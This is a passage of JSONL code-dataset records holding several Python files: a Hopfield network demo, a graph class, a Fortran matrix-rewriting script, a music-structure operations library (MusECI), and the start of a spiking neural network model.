links)\nprint(links)\nlearn_character(m, links)\nprint(links)\n\n#print(links)\n\ninput_chr = create_neurons([\n '#### ',\n ' #',\n ' #',\n '# # ',\n ' ## '])\n\n\n#print(links)\nprint(input_chr)\nshow(input_chr)\nrun_hopfield(input_chr, links)\nshow(input_chr)\n\n","sub_path":"machine_learning/hopfield_network/src/old/hn_char.py","file_name":"hn_char.py","file_ext":"py","file_size_in_byte":2143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"361891392","text":"class Graph:\n def __init__(self):\n self.number_of_nodes = 0\n self.adjacent_list = {}\n\n def add_vertex(self, node):\n self.adjacent_list[node] = []\n ++self.number_of_nodes\n\n def add_edge(self, node1, node2):\n self.adjacent_list[node1].append(node2)\n self.adjacent_list[node2].append(node1)\n\n def show_connections(self):\n all_nodes = self.adjacent_list.keys()\n for node in all_nodes:\n node_connections = self.adjacent_list[node]\n connections = \"\"\n for vertex in node_connections:\n connections += f\"{vertex} \"\n print(f\"{node} ---> {connections}\")\n\ngraph = Graph()\ngraph.add_vertex('0')\ngraph.add_vertex('1')\ngraph.add_vertex('2')\ngraph.add_vertex('3')\ngraph.add_vertex('4')\ngraph.add_vertex('5')\ngraph.add_vertex('6')\ngraph.add_edge('3', '1')\ngraph.add_edge('3', '4')\ngraph.add_edge('4', '2')\ngraph.add_edge('4', '5')\ngraph.add_edge('1', '2')\ngraph.add_edge('1', '0')\ngraph.add_edge('0', '2')\ngraph.add_edge('6', '5')\n\ngraph.show_connections()\n","sub_path":"python/data_structures/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"336073430","text":"#!/bin/env python\n\nimport subprocess, sys, os, re, math\n\ninputfilename=sys.argv[1]\noutputfilename=sys.argv[2]\n\ninput_file = open(inputfilename)\noutput_file = open(outputfilename, 'w')\n\nindex=1\n\nfor line in input_file:\n\n if line == \" PARAMETER ( NCOMB=144)\\n\":\n output_file.write(\" PARAMETER ( NCOMB=128)\\n\")\n elif \"DATA (NHEL\" in line:\n if line.split(',')[5] != \" 0\" or line.split(',')[6] != \" 0\":\n output_file.write(line.replace(line.split(',')[1],\" \"+str(index)+\")\"))\n index=index+1\n else:\n output_file.write(line)\n\ninput_file.close()\noutput_file.close()\n","sub_path":"make_transverse_matrix_f.py","file_name":"make_transverse_matrix_f.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"121596617","text":"from copy import deepcopy\nfrom MusECI.MusEciDataStructures import *\nfrom random import *\n\n# =================================================================\n# OPERATIONS ON MUSICAL STRUCTURES\n# Haskell Euterpea provides a number of basic operations on the\n# Music type. Only a few of them are presented here.\n# =================================================================\n\ndef removeDurs(musicVal):\n def stripDur(x): x.dur = None\n mMap(stripDur, musicVal)\n\ndef removeOnsets(musicVal):\n def stripOnset(x): x.onset = None\n mMap(stripOnset, musicVal)\n\ndef findBy(selectFun, x):\n retVals = []\n if selectFun(x):\n retVals.append(x)\n elif x.__class__.__name__ == \"Seq\" or isinstance(x, Par):\n for t in x.trees:\n newVals = findBy(selectFun, t)\n retVals = retVals+newVals\n elif x.__class__.__name__==\"Note\" or x.__class__.__name__==\"Rest\":\n if selectFun(x):\n retVals.append(x)\n elif x.__class__.__name__==\"Part\": # formerly Modify\n newVals = findBy(selectFun, x.tree)\n retVals = retVals+newVals\n return retVals\n\ndef minOnset(x):\n os = getOnsets(x)\n retVal = 0\n for o in os:\n if o==None:\n pass\n else:\n if o < retVal:\n retVal = o\n return retVal\n\ndef setDefaultOffset(x, defO):\n def oFun(x):\n if (x.__class__.__name__ == 'Note' or x.__class__.__name__ == 'Rest'):\n if (x.onset == None):\n x.onset = defO\n mMapAll(oFun, x)\n\ndef shiftOnsets(x, shiftAmt):\n def oFun(x):\n if (x.__class__.__name__ == 'Note' or x.__class__.__name__ == 'Rest'):\n if (x.onset != None):\n x.onset = x.onset + shiftAmt\n mMapAll(oFun, x)\n\ndef line(musicVals, correctOnsets=True):\n \"\"\"\n The line function build a \"melody\" with Seq constructors\n out of a list of music substructures. Values are NOT copied.\n :param musicVals: a list of musical structures\n :return: the sequential composition of the input list\n \"\"\"\n ms = deepcopy(musicVals)\n offset = 0\n if(correctOnsets):\n for m in ms:\n mdur = durOnset(m)\n shiftOnsets(m, offset)\n offset = offset + mdur\n return Seq(ms)\n\ndef par(musicVals): # Does NOT assign onsets by default\n \"\"\"\n The chord function build a \"chord\" with Par constructors\n out of a list of music substructures. Values are NOT copied.\n :param musicVals: a list of music structures\n :return: the parallel composition of the input\n \"\"\"\n ms = deepcopy(musicVals)\n return Par(ms)\n\ndef deriveOnsets(x, currentTime=0):\n #if (x.__class__.__name__ == 'Music'):\n # deriveOnsets(x.tree, 0)\n if (x.__class__.__name__ == 'Note' or x.__class__.__name__ == 'Rest'):\n if x.onset == None:\n x.onset = currentTime\n elif (x.__class__.__name__ == 'Seq'):\n ct = currentTime\n for t in x.trees:\n deriveOnsets(t, ct)\n ct = ct + dur(t)\n elif isinstance(x, Par):\n for t in x.trees:\n deriveOnsets(t, currentTime)\n elif (x.__class__.__name__ == 'Part'): # formerly Modify\n deriveOnsets(x.tree, currentTime)\n else:\n raise MusEciException(\"Unrecognized musical structure: \" + str(x))\n\ndef getOnset(x): # We assume onsets are defined\n if x.__class__.__name__ == \"Part\": # formerly Modify\n return getOnset(x.tree)\n elif x.__class__.__name__==\"Note\" or x.__class__.__name__ == \"Rest\":\n return x.onset\n elif x.__class__.__name__==\"Seq\":\n return getOnset(x.trees[0]) # we assume structural correctness for Seq (first is earliest onset)\n elif isinstance(x, Par):\n return min(list(map(getOnsets, x.trees))) # can't really make the same assumption for Par\n else:\n raise MusEciException(\"Unrecognized musical structure: \" + str(x))\n\ndef durOnset(x): # WE ASSUME ALL ONSETS HAVE BEEN DERIVED (no mix of actual numbers and Nones allowed)\n minO = min(getOnsets(x))\n maxE = max(getEndTimes(x))\n return maxE - minO\n\ndef getOnsets(x): # UNTESTED\n def getter(val): return val.onset\n return mMapAllRet(getter, x)\n\ndef getEndTimes(x):# UNTESTED\n def getter(val): return (val.onset + val.dur)\n return mMapAllRet(getter, x)\n\ndef scaleOnsets(x, shiftAmt):\n def oFun(x):\n if (x.__class__.__name__ == 'Note' or x.__class__.__name__ == 'Rest'):\n if (x.onset != None):\n x.onset = x.onset * shiftAmt\n mMapAll(oFun, x)\n\ndef dur(x): # WILL NOT HANDLE ONSETS\n \"\"\"\n Computes the duration of a music tree. Values are relative to the overall\n bpm for the entire tree, such that 0.25 is a quarter note.\n :param x: the music structure\n :return: the duration of x in whole notes (wn = 1.0)\n \"\"\"\n if (x.__class__.__name__ == 'Music'):\n d = max(list(map(dur,x.trees)))\n return d * (120/x.bpm)\n elif (x.__class__.__name__ == 'Note' or x.__class__.__name__ == 'Rest'):\n return x.dur\n elif (x.__class__.__name__ == 'Seq'):\n return sum(map(dur,x.trees)) # THIS IS NOT RIGHT FOR ONSETS\n elif isinstance(x, Par):\n return max(list(map(dur,x.trees)))\n elif (x.__class__.__name__ == 'Part'): # formerly Modify\n #if (x.mod.__class__.__name__ == 'Tempo'):\n # d = dur(x.tree)\n # return d / x.mod.value\n #else:\n return dur(x.tree)\n else:\n raise MusEciException(\"Unrecognized musical structure: \" + str(x))\n\n\ndef line(musicVals): # Does NOT assign onsets by default.\n \"\"\"\n The line function build a \"melody\" with Seq constructors\n out of a list of music substructures. Values are NOT copied.\n :param musicVals: a list of musical structures\n :return: the sequential composition of the input list\n \"\"\"\n return Seq(musicVals)\n\n\n\n\n\n\ndef mMap(f, x):\n \"\"\"\n The mMap function maps a function over the Notes in a Music value.\n :param f: Function to map over Notes\n :param x: the music structure to operate on\n :return: an in-place modification of the music structure\n \"\"\"\n if (x.__class__.__name__ == 'Music'):\n for t in x.trees:\n mMap(f, t)\n elif (x.__class__.__name__ == 'Note'):\n f(x)\n elif (x.__class__.__name__ == 'Rest'):\n pass # nothing to do to a Rest\n elif (x.__class__.__name__ == 'Seq' or isinstance(x, Par)):\n for t in x.trees:\n mMap(f, t)\n elif (x.__class__.__name__ == 'Part'): # formerly Modify\n mMap(f, x.tree)\n else:\n raise MusEciException(\"Unrecognized musical structure: \" + str(x))\n\n\n\ndef mMapAll(f, x):\n \"\"\"\n The mMapDur function is not found in Haskell Euterpea but may prove useful.\n It maps a function over Notes and Rests and applies it to the entire musical\n structure. Note: the function MUST handle the constructors directly if using\n something other than dur.\n :param f: The function to apply to durations (v.dur for a Note or Rest)\n :param x: the music structure to traverse\n :return: an in-place altered version of the music structure\n \"\"\"\n if (x.__class__.__name__ == 'Music'):\n for t in x.trees:\n mMapAll(f,t)\n elif (x.__class__.__name__ == 'Note' or x.__class__.__name__ == 'Rest'):\n f(x)\n elif (x.__class__.__name__ == 'Seq' or isinstance(x, Par)):\n for t in x.trees:\n mMapAll(f,t)\n elif (x.__class__.__name__ == 'Part'): # formerly Modify\n mMapAll(f, x.tree)\n else:\n raise MusEciException(\"Unrecognized musical structure: \" + str(x))\n\ndef mMapAllRet(f, x):\n \"\"\"\n The mMapDur function is not found in Haskell Euterpea but may prove useful.\n It maps a function over Notes and Rests and applies it to the entire musical\n structure. Note: the function MUST handle the constructors directly if using\n something other than dur.\n :param f: The function to apply to durations (v.dur for a Note or Rest)\n :param x: the music structure to traverse\n :return: an in-place altered version of the music structure\n \"\"\"\n if (x.__class__.__name__ == 'Music'):\n v = list()\n for t in x.trees:\n v += mMapAllRet(f,t)\n v += mMapAllRet(f,t)\n return v\n elif (x.__class__.__name__ == 'Note' or x.__class__.__name__ == 'Rest'):\n return [f(x)]\n elif (x.__class__.__name__ == 'Seq' or isinstance(x, Par)):\n v = list()\n for t in x.trees:\n v += mMapAllRet(f,t)\n v += mMapAllRet(f,t)\n return v\n elif (x.__class__.__name__ == 'Part'):\n return mMapAllRet(f, x.tree)\n else:\n raise MusEciException(\"Unrecognized musical structure: \" + str(x))\n\n\ndef transpose(x, amount):\n \"\"\"\n transpose directly alters the Notes of the supplied structure.\n Each Note's pitch number has amount added to it.\n :param x:\n :param amount:\n :return:\n \"\"\"\n def f(xNote): xNote.pitch = xNote.pitch+amount\n mMap(f, x)\n\n# The following volume-related functions deviate slightly from\n# Haskell Euterpea's methods of handling volume. This is because\n# the volume is stored directly in the Note class in Python, which\n# is not the case in Haskell Euterpea. Note: volumes are not\n# guaranteed to be integers with scaleVolume. You sould use\n# intVolume before converting to MIDI. You may wish to use\n# scaleVolumeInt instead.\n\ndef setVolume(x, volume): # set everything to a constant volume\n def f(xNote): xNote.vol = volume\n mMap(f,x)\n\ndef scaleVolume(x, factor): # multiply all volumes by a factor\n def f(xNote): xNote.vol = xNote.vol * factor\n mMap (f,x)\n\ndef scaleVolumeInt(x, factor): # multiply but then round to an integer\n def f(xNote): xNote.vol = int(round(xNote.vol * factor))\n mMap (f,x)\n\ndef adjustVolume(x, amount): # add a constant amount to all volumes\n def f(xNote): xNote.vol = xNote.vol + amount\n mMap (f,x)\n\ndef reverseInPlace(x):\n \"\"\"\n Reverse a musical structure in place (last note is first, etc.)\n :param x: the music structure to reverse.\n :return: the reversal of the input.\n \"\"\"\n #if (x.__class__.__name__ == 'Music'):\n # reverseInPlace(x.tree)\n if (x.__class__.__name__ == 'Note' or x.__class__.__name__ == 'Rest'):\n pass # nothing to do\n elif (x.__class__.__name__ == 'Seq'):\n x.trees.reverse()\n for t in x.trees:\n reverseInPlace(t)\n elif (x.__class__.__name__ == 'Par' or x.__class__.__name__ == 'Music'):\n dMax = dur(x)\n newTrees = []\n for t in x.trees:\n newTrees.append(Seq[Rest(dMax - dur(t)), reverseInPlace(t)])\n x.trees = newTrees\n elif (x.__class__.__name__ == 'Part'):\n reverseInPlace(x.tree)\n else: raise MusEciException(\"Unrecognized musical structure: \" + str(x))\n\ndef reverse(x): # DOES NOT HANDLE ONSETS\n x2 = deepcopy(x)\n reverseInPlace(x2)\n return x2\n\ndef reverseOnsetInPlace(x): # HANDLES ONSETS. Notes must store onsets. Rests may need to be cleared and redone.\n d = durOnset(x)\n reverseInPlace(x)\n def revOnset(aNote): aNote.onset = d - (aNote.onset + aNote.dur)\n mMapAll(revOnset, x)\n #deriveOnsets(x,0) # Might need to do this if rests are involved\n\ndef reverseOnset(x):\n x2 = deepcopy(x)\n reverseOnsetInPlace(x2)\n return x2\n\ndef reverseOnsetInPlaceWithin(x, startTime, endTime): # To reverse within a larger range.\n o = getOnset(x)\n d = durOnset(x)\n if (o==startTime and o+d==endTime):\n reverseOnsetInPlace(x)\n elif (o>startTime and o+d < endTime):\n reverseInPlace(x)\n def revOnset(aNote): aNote.onset = endTime - (aNote.onset - startTime + aNote.dur)\n mMapAll(revOnset, x)\n #deriveOnsets(x,0) # Might need to do this if rests are involved\n else:\n raise MusEciException(\"Selection must be a subset of the time span to be reversed.\")\n\ndef reverseOnsetWithin(x, startTime, endTime):\n x2 = deepcopy(x)\n reverseOnsetInPlaceWithin(x2, startTime, endTime)\n return x2\n\n\ndef times(music, n): # TO-DO: ONSET HANDLING\n \"\"\"\n Returns a new value that is n repetitions of the input musical structure.\n Deep copy is used, so there will be no shared references between the input\n and the output.\n :param music: the music structure to repeat\n :param n: how many times to repeat?\n :return: a new structure (so this should be called as a = times(b,n)\n \"\"\"\n return Seq([music]*n)\n\n\ndef cut(x, amount): # Should not be affected by onset handling\n \"\"\"\n Keeps only the first duration amount of a musical structure. The amount\n is in measures at the reference duration, which is 120bpm unless specified\n by the Music constructor. Note that this operation is messy - it can leave\n a lot of meaningless structure in place, with leaves occupied by Rest(0).\n :param x: the music value to alter\n :param amount: how many whole notes worth to take.\n :return: the furst amount of the music structure by time (whole note = 1.0)\n \"\"\"\n #if (x.__class__.__name__ == 'Music'):\n # cut(x.tree, amount)\n # return x\n if (x.__class__.__name__ == 'Note' or x.__class__.__name__ == 'Rest'):\n if amount <= x.dur:\n x.dur = amount\n return x\n elif (x.__class__.__name__ == 'Seq'):\n dLeft = amount\n newTree = []\n for t in x.trees:\n newTree.append(cut(t, dLeft))\n dLeft = max(0,dLeft - dur(t))\n x.trees = newTree\n return x\n elif isinstance(x, Par):\n newTrees = []\n for t in x.trees:\n newTrees.append(cut(t,amount))\n x.trees = newTrees\n return x\n elif (x.__class__.__name__ == 'Part'):\n #if (x.mod.__class__.__name__ == 'Tempo'):\n # cut(x.tree, amount*x.mod.value)\n #else:\n cut(x.tree, amount)\n return x\n else: raise MusEciException(\"Unrecognized musical structure: \" + str(x))\n\n\ndef remove(x, amount): # TO-DO: ONSET HANDLING (DO WE WANT IT TO NORMALIZE TO STARTING AT ZERO?)\n \"\"\"\n The opposite of \"cut,\" chopping away the first amount. Note that this\n operation is messy - it can leave a lot of meaningless structure in\n place, with leaves occupied by Rest(0).\n :param x: the music structure to alter\n :param amount: how much to cut off of the beginning?\n :return:\n \"\"\"\n if amount<=0:\n return x # nothing to remove!\n #elif (x.__class__.__name__ == 'Music'):\n # remove(x.tree, amount)\n # return x\n elif (x.__class__.__name__ == 'Note' or x.__class__.__name__ == 'Rest'):\n if amount >= x.dur:\n x.dur = 0\n if amount < x.dur:\n x.dur = x.dur - amount\n return x\n elif (x.__class__.__name__ == 'Seq'):\n dLeft = amount\n newTree = []\n for t in x.trees:\n d = dur(t)\n newTree.append(remove(t, dLeft))\n dLeft = max(0,dLeft - d)\n x.trees = newTree\n return x\n elif isinstance(x, Par):\n newTrees = []\n for t in x.trees:\n newTrees.append(remove(t,amount))\n x.trees = newTrees\n return x\n elif (x.__class__.__name__ == 'Part'):\n #if (x.mod.__class__.__name__ == 'Tempo'):\n # remove(x.tree, amount*x.mod.value)\n #else:\n remove(x.tree, amount)\n return x\n else: raise MusEciException(\"Unrecognized musical structure: \" + str(x))\n\n\n\n# ======================== BEGIN UNTESTED ======================== #\n\n\ndef mFold(x, noteOp, restOp, seqOp, parOp, modOp): # Onsets can't reasonably be handled in this function. We are also unlikely to use it for anything.\n \"\"\"\n The mFold operation traverses a music value with a series of operations\n for the various constructors. noteOp takes a Note, restOp takes a Rest,\n seqOp and parOp take the RESULTS of mFolding over their arguments, and\n modOp takes a modifier (x.mod) and the RESULT of mFolding over its\n tree (x.tree).\n :param x:\n :param noteOp:\n :param restOp:\n :param seqOp:\n :param parOp:\n :param modOp:\n :return:\n \"\"\"\n #if (x.__class__.__name__ == 'Music'):\n # return mFold(x.tree, noteOp, restOp, seqOp, parOp, modOp) # todo?: update modOp to something relevant to Part\n if (x.__class__.__name__ == 'Note'):\n return noteOp(x)\n elif (x.__class__.__name__ == 'Rest'):\n return restOp(x)\n elif (x.__class__.__name__ == 'Seq'):\n vals = [mFold(t, noteOp, restOp, seqOp, parOp, modOp) for t in x.trees]\n return seqOp(vals)\n elif isinstance(x, Par):\n vals = [mFold(t, noteOp, restOp, seqOp, parOp, modOp) for t in x.trees]\n return parOp(vals)\n elif (x.__class__.__name__ == 'Part'):\n val = mFold(x.tree, noteOp, restOp, seqOp, parOp, modOp)\n #return modOp(x.mod, val)\n return val\n else: raise MusEciException(\"Unrecognized musical structure: \" + str(x))\n\n\ndef firstPitch(x): # TO-DO: ONSET HANDLING\n \"\"\"\n The firstPitch function returns the first pitch in the Music value.\n None is returned if there are no notes. Preference is lef tand top.\n :param x:\n :return:\n \"\"\"\n #if (x.__class__.__name__ == 'Music'):\n # return firstPitch(x.tree)\n if (x.__class__.__name__ == 'Note'):\n return x.pitch\n elif (x.__class__.__name__ == 'Rest'):\n return None\n elif (x.__class__.__name__ == 'Seq' or isinstance(x, Par)):\n vals = list(map(firstPitch, x.trees))\n if len(vals) > 0:\n return vals[0]\n else:\n return -1\n elif (x.__class__.__name__ == 'Part'):\n return firstPitch(x.tree)\n else: raise MusEciException(\"Unrecognized musical structure: \" + str(x))\n\n\ndef getPitches(m):\n \"\"\"\n An application of mFold to extract all pitches in the music\n structure as a list.\n :param m:\n :return:\n \"\"\"\n def fn(n): return [n.pitch]\n def fr(r): return []\n def fcat(a,b): return a+b\n def fm(m,t): return t\n return mFold(m, fn, fr, fcat, fcat, fm)\n\n\ndef invertAt(m, pitchRef):\n \"\"\"\n Musical inversion around a reference pitch. Metrical structure\n is preserved; only pitches are altered.\n :param m:\n :param pitchRef:\n :return:\n \"\"\"\n def f(aNote): aNote.pitch = 2 * pitchRef - aNote.pitch\n ret = mMap(f, m)\n return ret\n\n\ndef invert(m):\n \"\"\"\n Musical inversion around the first pitch in a musical structure.\n :param m:\n :return:\n \"\"\"\n p = firstPitch(m)\n ret = invertAt(m, p)\n return ret\n\n\ndef instrument(m, value):\n \"\"\"\n Shorthand for setting an instrument.\n :param m:\n :param value:\n :return:\n \"\"\"\n return Part(m, Instrument(value)) # Modify(Instrument(value), m)\n\n\ndef removeInstruments(x):\n \"\"\"\n Remove Instrument modifiers from a musical structure\n :param x:\n :return:\n \"\"\"\n def checkInstMod(x): # function to get rid of individual nodes\n if x.__class__.__name__ == 'Part':\n #if x.mod.__class__.__name__ == 'Instrument': return x.tree\n #else: return x\n return x.tree\n else: return x\n #if x.__class__.__name__ == 'Music':\n # tNew = checkInstMod(x.tree)\n # removeInstruments(x.tree)\n # return x\n if x.__class__.__name__ == 'Note' or x.__class__.__name__ == 'Rest':\n return x\n elif x.__class__.__name__ == 'Seq' or isinstance(x, Par):\n newTrees = []\n for t in x.trees:\n newTrees.append(checkInstMod(x.left))\n x.trees = list(map(removeInstruments, newTrees))\n return x\n elif x.__class__.__name__ == 'Part':\n xNew = checkInstMod(x)\n return xNew\n else: raise MusEciException(\"Unrecognized musical structure: \" + str(x))\n\n\ndef changeInstrument(m, value):\n x1 = instrument(value, x)\n x = removeInstruments(m)\n return x1\n\n\n# Scale all durations in a music structure by the same amount.\ndef scaleDurations(m, factor):\n def f(x): x.dur = x.dur*factor\n x = mMapAll(f, m)\n return x\n\ndef scaleDursOnsets(m, factor): # Option for use with onsets\n def f(x):\n x.dur = x.dur * factor\n if (x.onset != None): x.onset * factor\n x = mMapAll(f,m)\n return x\n\n# ======================== END UNTESTED ======================== #\n\n\n\n# =============================================================================================\n# Some extra supporting functions for compatibility with more pure vector/list\n# representations of melodies and chords.\n\n\n# Convert a pitch number to a single note. NO ONSET HANDLING (use deriveOnsets)\ndef pitchToNote(p, defDur=0.25, defVol=100):\n if p==None:\n return Rest(defDur)\n else:\n return Note(p, defDur, None, defVol)\n\n\n# Convert a list of pitches to a melody using a default note duration. NO ONSET HANDLING (use deriveOnsets)\ndef pitchListToMusic(ps, defDur=0.25, defVol=100):\n ns = [pitchToNote(p, defDur, defVol) for p in ps]\n return line(ns)\n\n\n# Synonym for consistency with some other naming schemes. NO ONSET HANDLING (use deriveOnsets)\n# This does the same thing as pitchListToMusic\ndef pitchListToMelody(ps, defDur=0.25, defVol=100):\n return pitchListToMusic(ps, defDur, defVol)\n\ndef pdPairsToMusic(pds, defVol=100): # NO ONSET HANDLING (use deriveOnsets)\n \"\"\"\n Convert a list of pitch+duration pairs to a melody (a bunch of Notes in sequence).\n pdPair = pitch-duration pair\n :param pds: pairs of pitch and duration: [(p1,d1), (p2,d2), ...]\n :param defVol: default volume\n :return: music structure as a melody\n \"\"\"\n ns = [Note(x[0], x[1], None, defVol) for x in pds]\n return line(ns)\n\ndef pdPairsToMelody(pds, defVol=100): # This is just a synonym for pdPairsToMusic - NO ONSET HANDLING\n return pdPairsToMusic(pds, defVol)\n\ndef pdPairsToChord(pds, defVol=100): # NO ONSET HANDLING\n \"\"\"\n Convert a list of pitch+duration pairs to a chord (a bunch of Notes in parallel).\n NOTE: start times will be the same for all pitches, but end times will be based on\n the duration of the notes - so they may end at different times!\n pdPair = pitch-duration pair\n :param pds: pairs of pitch and duration: [(p1,d1), (p2,d2), ...]\n :param defVol: default volume\n :return: music structure as a chord\n \"\"\"\n ns = [Note(x[0], x[1], None, defVol) for x in pds]\n return par(ns)\n\n\n# Convert a list of pitches to a chord (a bunch of Notes in parallel). NO ONSET HANDLING (use deriveOnsets)\ndef pitchListToChord(ps, defDur=0.25, defVol=100):\n if ps == None:\n return Rest(defDur)\n else:\n ns = [Note(p, defDur, defVol) for p in ps]\n return par(ns)\n\n\n# Convert a list of chords (a list of lists of pitches) to a music structure. NO ONSET HANDLING (use deriveOnsets)\ndef chordListToMusic(chords, defDur=0.25, defVol=100):\n cList = [pitchListToChord(x, defDur, defVol) for x in chords]\n return line(cList)\n\n\ndef removeZeros(x): # MAY NEED TO HANDLE ONSETS IN DURATION CALL\n #if (x.__class__.__name__ == 'Music'):\n # x.tree = removeZeros(x.tree)\n # return x\n if (x.__class__.__name__ == 'Note' or x.__class__.__name__ == 'Rest'):\n return x # can't remove at this stage\n elif (x.__class__.__name__ == 'Seq' or isinstance(x, Par)):\n newTrees = []\n for t in x.trees:\n t2 = removeZeros(t)\n if dur(t2) > 0:\n newTrees.append(t2)\n x.trees = newTrees\n return x\n elif (x.__class__.__name__ == 'Part'):\n x.tree = removeZeros(x.tree)\n return x\n else:\n raise MusEciException(\"Unrecognized musical structure: \" + str(x))\n\ndef removeZerosOnset(x): # MAY NEED TO HANDLE ONSETS IN DURATION CALL\n #if (x.__class__.__name__ == 'Music'):\n # x.tree = removeZerosOnset(x.tree)\n # return x\n if (x.__class__.__name__ == 'Note' or x.__class__.__name__ == 'Rest'):\n return x # can't remove at this stage\n elif (x.__class__.__name__ == 'Seq' or isinstance(x, Par)):\n newTrees = []\n for t in x.trees:\n t2 = removeZerosOnset(t)\n if durOnset(t2) > 0:\n newTrees.append(t2)\n x.trees = newTrees\n return x\n elif (x.__class__.__name__ == 'Part'):\n x.tree = removeZerosOnset(x.tree)\n return x\n else:\n raise MusEciException(\"Unrecognized musical structure: \" + str(x))\n\n#=============================================================\n\ndef scaleTranspose1(pitchNum, halfsteps, scale):\n '''\n Transposes a single pitch within a scale by a certain number of halfsteps, if\n it is possible to do so. If it isn't, a different intervale +/-1 from the original\n is selected at random to match the scale. Note: this strategy only works with\n Major and Minor and would need reworking to be used with other scales like pentatonic.\n :param pitchNum:\n :param halfsteps:\n :param scale:\n :return:\n '''\n newPC = (halfsteps + pitchNum) % 12\n if newPC in scale:\n return pitchNum + halfsteps\n else:\n r = choice([-1,1])\n return pitchNum + halfsteps + r\n\ndef scaleTransposeM(music, halfsteps, scale):\n '''\n Transposes an entire music value using scaleTranspose1\n :param music:\n :param halfsteps:\n :param scale:\n :return:\n '''\n def notefun(x):\n newPNum = scaleTranspose1(x.pitch, halfsteps, scale)\n x.pitch = newPNum\n mMap(notefun, music)\n\ndef scaleInvertAt(m, pitchRef, scale):\n \"\"\"\n Musical inversion around a reference pitch. Metrical structure\n is preserved; only pitches are altered.\n :param m:\n :param pitchRef:\n :return:\n \"\"\"\n #def f(aNote): aNote.pitch = scaleTranspose1(0, 2 * pitchRef - aNote.pitch, scale)\n def f(aNote): aNote.pitch = scaleTranspose1(aNote.pitch, (2 * pitchRef) - (2 * aNote.pitch), scale)\n ret = mMap(f, m)\n return ret\n\n\ndef scaleInvert(m, scale):\n \"\"\"\n Musical inversion around the first pitch in a musical structure.\n :param m:\n :return:\n \"\"\"\n p = firstPitch(m)\n ret = scaleInvertAt(m, p, scale)\n return ret\n\ndef isNote(x): return x.__class__.__name__ == \"Note\"\ndef isRest(x): return x.__class__.__name__ == \"Rest\"\n\ndef stripRests(x):\n if x.__class__.__name__ == \"Part\":\n stripRests(x.tree)\n elif x.__class__.__name__ == \"Seq\" or isinstance(x, Par):\n for t in x.trees: # recursively strip rests from subtrees\n stripRests(t)\n okTrees = [x for x in x.trees if not (isRest(x))] # remove any rests appearing at this level\n x.trees = okTrees\n else:\n pass\n\n\ndef fillRests(x):\n if x.__class__.__name__ == \"Part:\":\n fillRests(x.tree)\n elif x.__class__.__name__ == \"Seq\": # Note: we assume a non-empty tree here! Probably need to update later\n newTrees = list()\n currOnset = getOnset(x)\n for t in x.trees:\n o = getOnset(t)\n if o > currOnset:\n newTrees.append(Rest(o - currOnset, currOnset))\n newTrees.append(t)\n elif isinstance(x, Par):\n for t in x.trees:\n fillRests(t) # Not sure how best to handle this. Do we necessarily want Rests within a Par?\n else:\n pass # don't need to alter existing notes and rests\n\n\n# for generalizing transpose, invert etc. to lists of potentially disconnected items.\n\ndef inPlaceMusicOp(op, x):\n if hasattr(x, '__iter__'):\n for v in x:\n op(v)\n else:\n op(x)\n\ndef retMusicOp(op, x):\n if hasattr(x, '__iter__'):\n vals = list()\n for v in x:\n list.append(op(v))\n else:\n result = op(x)\n return result\n\ndef flatten(musicVal): # remove unnecessary Seq and Par intermediate nodes\n x = deepcopy(musicVal)\n if x.__class__.__name__ == \"Seq\" or isinstance(x, Par):\n newTrees = list()\n print(len(x.trees))\n for t in x.trees:\n newTrees.append(flatten(t))\n if len(newTrees) == 1:\n return newTrees[0]\n else:\n x.trees = newTrees\n return x\n elif x.__class__.__name__ == \"Note\" or x.__class__.__name__ == \"Rest\":\n return x\n elif x.__class__.__name__ == \"Part\":\n x.tree = flatten (x.tree)\n return x\n","sub_path":"MusECI/BasicOperations.py","file_name":"BasicOperations.py","file_ext":"py","file_size_in_byte":28134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"546758888","text":"from __future__ import print_function\nimport torch\nimport numpy as np\n\nfrom snn.utils import filters\nfrom snn.models.base import SNNetwork\n\n\nclass BinarySNN(SNNetwork):\n def __init__(self, n_input_neurons, n_hidden_neurons, n_output_neurons, topology, synaptic_filter=filters.base_filter,\n n_basis_feedforward=1, n_basis_feedback=1, tau_ff=1, tau_fb=1, mu=1, initialization='uniform', weights_magnitude=0.01, device='cpu', save_path=None):\n\n super(BinarySNN, self).__init__(n_input_neurons=n_input_neurons, n_hidden_neurons=n_hidden_neurons, n_output_neurons=n_output_neurons, topology=topology,\n synaptic_filter=synaptic_filter, n_basis_feedforward=n_basis_feedforward, n_basis_feedback=n_basis_feedback, tau_ff=tau_ff,\n tau_fb=tau_fb, mu=mu, initialization=initialization, weights_magnitude=weights_magnitude, device=device, save_path=save_path)\n\n\n # Feedforward weights are a tensor of size [n_learnable_neurons, n_neurons, n_basis_feedforward] for which the block-diagonal elements are 0,\n # and otherwise 1s in the topology are distributed according to initialization\n self.ff_weights_shape = torch.Size([self.n_learnable_neurons, self.n_neurons, self.n_basis_feedforward])\n self.feedforward_mask = torch.tensor(np.kron(topology, np.ones([self.n_basis_feedforward])).reshape(self.ff_weights_shape), dtype=torch.float).to(self.device)\n assert self.feedforward_mask.shape == self.ff_weights_shape\n\n self.initialize_ff_weights(topology, howto=initialization, gain=weights_magnitude)\n\n\n # Feedback weights are a tensor of size [n_neurons, n_basis_feedback], for which learnable elements are distributed according to initialization\n self.fb_weights_shape = torch.Size([self.n_learnable_neurons, self.n_basis_feedback])\n self.initialize_fb_weights(topology, howto=initialization, gain=weights_magnitude)\n\n\n # Bias weights are a tensor of size [n_learnable_neurons], for which learnable elements are distributed according to initialization\n self.bias_shape = torch.Size([self.n_learnable_neurons])\n self.initialize_bias_weights(topology, howto=initialization, gain=weights_magnitude)\n\n # Number of timesteps to keep in memory\n self.memory_length = max(self.tau_ff, self.tau_fb)\n\n ### State of the network\n self.spiking_history = torch.zeros([self.n_neurons, 2]).to(self.device)\n\n\n\n def forward(self, input_signal):\n assert self.n_neurons == (len(self.input_neurons) + len(self.hidden_neurons) + len(self.output_neurons)), \"The numbers of neurons don't match\"\n assert self.n_neurons == (len(self.learnable_neurons) + len(self.input_neurons)), \"The numbers of neurons don't match\"\n\n\n ### Compute potential\n ff_trace = 